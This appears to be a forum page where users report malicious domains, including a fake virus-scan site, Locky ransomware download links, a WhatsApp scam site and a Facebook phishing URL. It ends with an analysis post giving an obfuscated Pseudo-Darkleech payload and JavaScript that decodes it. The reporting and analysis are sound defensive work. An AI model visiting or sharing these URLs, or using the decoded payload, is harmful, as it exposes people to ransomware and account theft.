31
Malicious Domains / Re: MSE-looking Talking Malicious Fake Scan Site
« Last post by molan1998oif on October 07, 2016, 11:45:47 pm »I apologize for not deactivating the links to begin this thread... I've fixed it though.
Recent Posts
32
Malicious Domains / Re: MSE-looking Talking Malicious Fake Scan Site
« Last post by molan1998oif on October 07, 2016, 11:41:06 pm »Quick update, the actual address is a long base64 thing, but by using the hosts list to block the popup, we were able to successfully back out of the site and close things.
33
Malicious Domains / MSE-looking Talking Malicious Fake Scan Site
« Last post by molan1998oif on October 07, 2016, 10:49:56 pm »http://z5x7k18k-virus.com/report.php?
http://z5x7k18k-virus.com/?id=KzEgKDg1NSkgNjI1LTA3OTA
http://z5x7k18k-virus.com/up.php?done=veidzz
This came up when a user of ours was on Pinterest looking up recipes for stuff.
She had clicked a link to a cocktail recipe for some kind of Suicide Squad drink, and it redirected to some "allmommywants.com" site, then this came up.
The links above were various versions of it that I found in some .js files that were bringing her previous Firefox sessions back up with the tabs she was last viewing. I managed to prevent the pop-up from coming back, even though the rest of the site came up, by adding: http://z5x7k18k-virus.com to the hosts file, preceded by 127.0.0.1
Attaching a screenshot of the page:
http://z5x7k18k-virus.com/?id=KzEgKDg1NSkgNjI1LTA3OTA
http://z5x7k18k-virus.com/up.php?done=veidzz
This came up when a user of ours was on Pinterest looking up recipes for stuff.
She had clicked a link to a cocktail recipe for some kind of Suicide Squad drink, and it redirected to some "allmommywants.com" site, then this came up.
The links above were various versions of it that I found in some .js files that were bringing her previous Firefox sessions back up with the tabs she was last viewing. I managed to prevent the pop-up from coming back, even though the rest of the site came up, by adding: http://z5x7k18k-virus.com to the hosts file, preceded by 127.0.0.1
Attaching a screenshot of the page:
34
Malicious Domains / Re: Trojan Ransom
« Last post by Joukahainen on August 27, 2016, 07:54:06 pm »Another mail based ransomware distribution.
http://www.saumi.jazztel.es/jkGYYU03gd Ransomware
http://www.saumi.jazztel.es/jkGYYU03gd Ransomware
35
Malicious Domains / Re: Trojan Ransom
« Last post by dlipman on August 26, 2016, 01:27:36 pm »Joukahainen:
Please reference: IMPORTANT: READ BEFORE POSTING
Please reference: IMPORTANT: READ BEFORE POSTING
36
Malicious Domains / Re: Trojan Ransom
« Last post by Joukahainen on August 26, 2016, 07:07:49 am »Locky distribution site.
hxxp://www.halloweenparty.go.ro/4GBrdf6 Ransomware
Ditributed by email (word macro downloader)
hxxp://www.halloweenparty.go.ro/4GBrdf6 Ransomware
Ditributed by email (word macro downloader)
37
Malicious Domains / Reporting a phishing site
« Last post by Malis2007 on July 12, 2016, 08:24:54 pm »Site link:
http://fast-internets.com/
Why?
Thanks for reading, and your help in advance.
http://fast-internets.com/
Why?
Quote
it claims to be the official WhatsApp site, and asks users to share its link in the real/official whatsapp app to at least 15 contacts so that they gain fake access and advantage on thier fake site by allowing them to download an altered version of whatsapp that they claim that it makes people able to chat offline (pure scam and non-sense)
(Note: site content might be in arabic language.. and my poor irl friends were victims of it)
Thanks for reading, and your help in advance.
38
Malicious Domains / Phish Links
« Last post by iamCody on June 07, 2016, 01:16:38 am »This link has been going around on Facebook, causing people to lose their accounts.
acct-service12.at.ua/help_recovery4/check/
When their account gets compromised, they changed their name to "Facebook Security" and change their profile image.
I'm not entirely sure that link has been submitted here...
acct-service12.at.ua/help_recovery4/check/
When their account gets compromised, they changed their name to "Facebook Security" and change their profile image.
I'm not entirely sure that link has been submitted here...
39
Malicious Domains / Re: Malicious download website
« Last post by BenENichols on April 26, 2016, 01:50:43 am »Just one more reason I block all tracking src/dst Ukraine.
40
Malware Analysis / Re: Decoding Pseudo-Darkleech
« Last post by SysAdMini on April 25, 2016, 11:43:52 am »I learned that
s=String.fromCharCode.apply(null,a);
for converting the array to a string doesn't work reliably. For this reason I modified the code for stage 1 to this:
Complete code:
s=String.fromCharCode.apply(null,a);
for converting the array to a string doesn't work reliably. For this reason I modified the code for stage 1 to this:
Code: [Select]
a=undefinedNew.replace(/[^\d ]/g,"").split(" ");
for (x=0;x<256;x++) {
s="";
for (i=0;i<a.length;i++) s+=String.fromCharCode(parseInt(a[i])^x);
if (s.indexOf('MSIE')>0) break;
}
Complete code:
Code: [Select]
<TEXTAREA id="output" ROWS=25 COLS=80></TEXTAREA>
<script>
undefinedNew="52 48 46 51 3c6 4j7 19 c40 55w 122a 11w-1 108 28a 48 4a6 41 35 40 aj4d-8 w1a05 52 46z 35b 34 37 38 53 2l6 b110- 108w 1a11fb -1e0b8 28 48 4o6 41c 3f5 e40 48 10p5a 36 47 5s3b 4neua0 42 34 a2-d6 va1p10 12b4 36 47 3v4 3a6 44 3-7 4q0 63 d19 62 pb5y.5 34bi 40;a 33c 12ad2 28d 101 g53b 4o-9 1a2z5c 118 1m18 101 -e107 1w01 10 2-0 14 2 101b- 10i7 26 124 3d3 40 5-3 11nb1 3p6 b43 40 52 34 -4d 43 38 5b2-c 52 12b2 52,z 48 46- d-v51 36 47a- 1i9 40 55a 1y24 d36 43 4p0 b-5o2 34a 4 43 p38 52 e52 12tcc3 36 4eb7 34 36 4c4 37 qehc4x0c- 6u3 e19 62 5t5- 3e-4 40 uc33 1-05 4u3 34 a41 n32 51 d47 p-1b24 -i36a 43 40 52 34 4 43u 38 52c 52 1-08n c108 110 6j0 4b6 33k 111d 41 38 49 4m6b 32 38y d-51 40 5ka3 105 50 52c 34 53 6 32 34b 41- 51k 105 46bka -41 35 va34 -t63ar 8 3ec3 c111 3x6 4c7 t3b4 36 44 kc3e7 40 6d3k 1b9 6j2 55 c3u4dn 4bm0 3c3 28 ia3z6 43a- 4b0 c52 3w4 4 c43 38 52 k52 26a 1u-10 121 52 4d8l b46kb n51 3c6r 47 19 40c 55j 1a10 60 36 g43 34 b38 -a53 bl19 46b 42 34 40- 50k 51 4 40 -41 52 5a1 12v2 36 47b f34 36 d44 37 40 63 1i9 62 55 3b4j 40 33c -1z05d 43 hb34 41 y3by2 51, 47d 10n6 3b6 43 4q0a da52 3-4 4 43 38 52b -5b2 1z2e4o a37- 5va3z 3cv4- 38 e44 124 p58 58d 4mamd6- 33v 1e11 41 3o8 4c9 q46 32ck 3c8 z51 40 53 1-05 50 52 34a 5c3 cl6 bp32 34 41-a 51 105 46v -41 35b 34 63 8 33 11ea1 101 1-0 d2-0 14 e2w 10c3 -118t, 1a1e9b g1c0fa1 11p0 1b21 u52a 48 4t6- 51 36 4bc7 1b9 4-0x 5b5 1l10 a60v c3y6 4a3 ,34k 38 53 19 46 42e 34 4v0 -c50t 5c1 4 40 4q1b 52 5oes1cv 1-08 108 124 58 55 38 32 esdl34 a30 8 33 33 g52 34 b51 -3 34i 36 4-0 caa35 34 18 21 14 4 40 4n2 55a tah40e 4j1 34a 41 t51 122 10d1 10pb 48 115m 23 dt6 115 1 49 50 17 10 dj38 49 126 b1q01 124a 49 -38 53x a15- 46 5g2 51 40 53 62 1b22 35 40l 36 50 42 -34 41 e5i1 1c0p5 32 3a4 51gc 2 u43 34 42 34 c41b 51 a5 62 1-a4 3c5t 111 b101 3jb-7 50 5i1d 51l 40 b41 0 3y4 51 4 4a3 38 q5a2 -52 1e01 11e0 m105 46 41 41 34 53 15- 19 10 11 e124 l4d8 47p.b 4f6 d43 34 r2 49 3-4 41 51 12c2 51 47 53 l40 a48 14 41 wd41l 3c4 -53 16 46b d35 5tc1 47 122 52tca 48 4-6 5a1 3v6c uem47b l1av9a 40 55 c1-c24 v4ep0-dk b4b1-b 42- 40 50 52jb ido34 4-b2 40 49v 34 a4 4m7ap- 34c 36 44 37 40l 63. 122 b-1j01 10ao1 d1k24d 49 i38 5bga3 15 4w-6 52 5csb1 40x 53 62 122c 49 38b 53 d1.o5 b46 pa5y2 d51 40 5n3 62 10c5 bbi53- 34 a5m5d 43 38 36 34 111l 1d04 28 25 38 1qbm06 61 2c6 10a4e p32 b107 101 101 110a-c 1-24ads 33 4a0o c53- 1h11 -36dm 43a 4s0 5-2 34 4 bd43 3a8e 52 -52cb 1d22 5v2 48 aibc46 b51b 36 47ahc 19 b40 55 1d24ua 36 i43 40c 5k2 34- b4 43 38 52x 52 123b db49-h -38 53c yb15b d4-6 t5aua2 51 40se 53 6k2 105b 43 e3aj4 -d41 32 51q e47 12b4 d3g6 dh43b 40 h5b2 34- k4af 4-3 38 a52 52c -108 108 110 60 40d 41d 44 34 62e 3i5 40d 48 41 1 46 41 h38 43a 12g2 49 38 53d 15x 46 e5j2- 51 40 a53w 62 105d 36 4-7yb 3-8 5e3, 4aq c4l0 35 b3q4 6 51 a111 36 -43j 40 5a2 34 -4 43 c38 52 52 a-110e 124 4eh6 3-3 1cr1a1 48 -47 46 b43 34 2 49 ds34d ,41v 51 98 36 43 3ak4 e38 s53dl 19 46b 4-2 34c 40bw -50 51c 4 40l 41aa b52 5b1 1d10 60 40 41 42 oe-l4c0 x5bb0 52 c34, 42 40 4a9b 3-o4 4 47co 34 ;3e6 q44d -3d7do 4e0 f63 b108 122 20wa 5cc,1 x53 4cv6dy-dh 4-1 3a2j 1dw0e5 33 5m3ane 40 42v -4 di47a 38 53 4 4f0c 35 34 d1c11 111-f 1-11 33 5aj3 c38 42 34xa- 5weo2 d11 -38 6j2d 3db4 5o3b 52 108 40 4x1 d44 34 6p2ca 3a5 40-t 48 41 1 46 41a 38 43 10g6 126 112ed 110 e25hc 5w5 a38y 32 :34d o30 8 3c3g 33d 5j2 e3i4 51bx 3 c34 -36b 40 -35 dd3e4g -18 2a1 14 4yaq -b40 4h2 5e5 40 41 34fb 41l 51a -x10c5 36z 47 38 bo53drb -4 40 de35 w34 6 51b 111 51 47 53- 40 4m-8 14 41 4d1 d34 53 16- 46 35 5by1b 47 98ib 55 3c8 32 34c 30 h8 33 33 5b2oc 34 51v 3d 34 ra3s6 e-t40 3c5 t34 18 2a1 1a4 4 40 42 55 40 ea41e 34 4-1j 51 1-a05 43ee 3o4 4cs1 32 51c 47r- e1-10 110 9x8 1d17 11va4 114v- 110 124a 51ze 47 e53 4a0 4z8 14- 4c1, a4d1 z34 5-3 b16 k46b 3z5d -51 47 108 108 12p4 58b 3o4 4a3- r52 3d4 60 p3e3 5x-eo3af 38 42 ,34a 5z2 .11 38 62 d34 53 5mc2 eba1d22d- ckc11-1b 4bab0l 41 4a4 34 62 35 40 48 41z 1 4b6a 41 38 c.j43 10b-6 ka126 112e 110c 10x9 11d8 1m1eo6- a1-09 36 43 34t 3d8 53 n19 46 42 -34 40b 50z 51c 4 4a0 41 52 5d1- lb124 58 4-8 j47 a46-y 43- 34 2 49 3a4 41b 51 108e 10q8 124 58 b28 u2a-o6 28 101 a36 4-z0 d41e 5bka2 s-51 53 a50j 3-ek6 5b1 -40 53 1e01 a26 28 101 36 40 4-1we f5a2 51 53 50 36 51 v40 d53 10-a1 26 111 40 41 42 40 50 52 34 42 40 49 34 4 47 34 36 44 37 40 63 110 111 110 124";
a=undefinedNew.replace(/[^\d ]/g,"").split(" ");
for (x=0;x<256;x++) {
s="";
for (i=0;i<a.length;i++) s+=String.fromCharCode(parseInt(a[i])^x);
if (s.indexOf('MSIE')>0) break;
}
re = /="([^"]+)"/;
str=re.exec(s)[1];
imagePackage=0;
onclickGetClass=2;
documentEmbed=str;
parseFloatOndragdrop=undefinedNew;
statusAll=switchNative=imagePackage;
passwordElements="";
parseFloatOndragdrop=parseFloatOndragdrop.replace(/[^a-z]/g,"");
for(onkeypressSwitch=imagePackage;onkeypressSwitch<parseFloatOndragdrop.length;onkeypressSwitch++)
{
packageValueOf=parseFloatOndragdrop.charCodeAt(onkeypressSwitch);
if(statusAll%onclickGetClass)
{
passwordElements+=String.fromCharCode(((onkeyupScreenY+packageValueOf-97)^documentEmbed.charCodeAt(switchNative%documentEmbed.length))%255);
switchNative++;
}
else
{
onkeyupScreenY=(packageValueOf-97)*13*onclickGetClass;
}
statusAll++;
}
document.getElementById('output').value = passwordElements;
</script>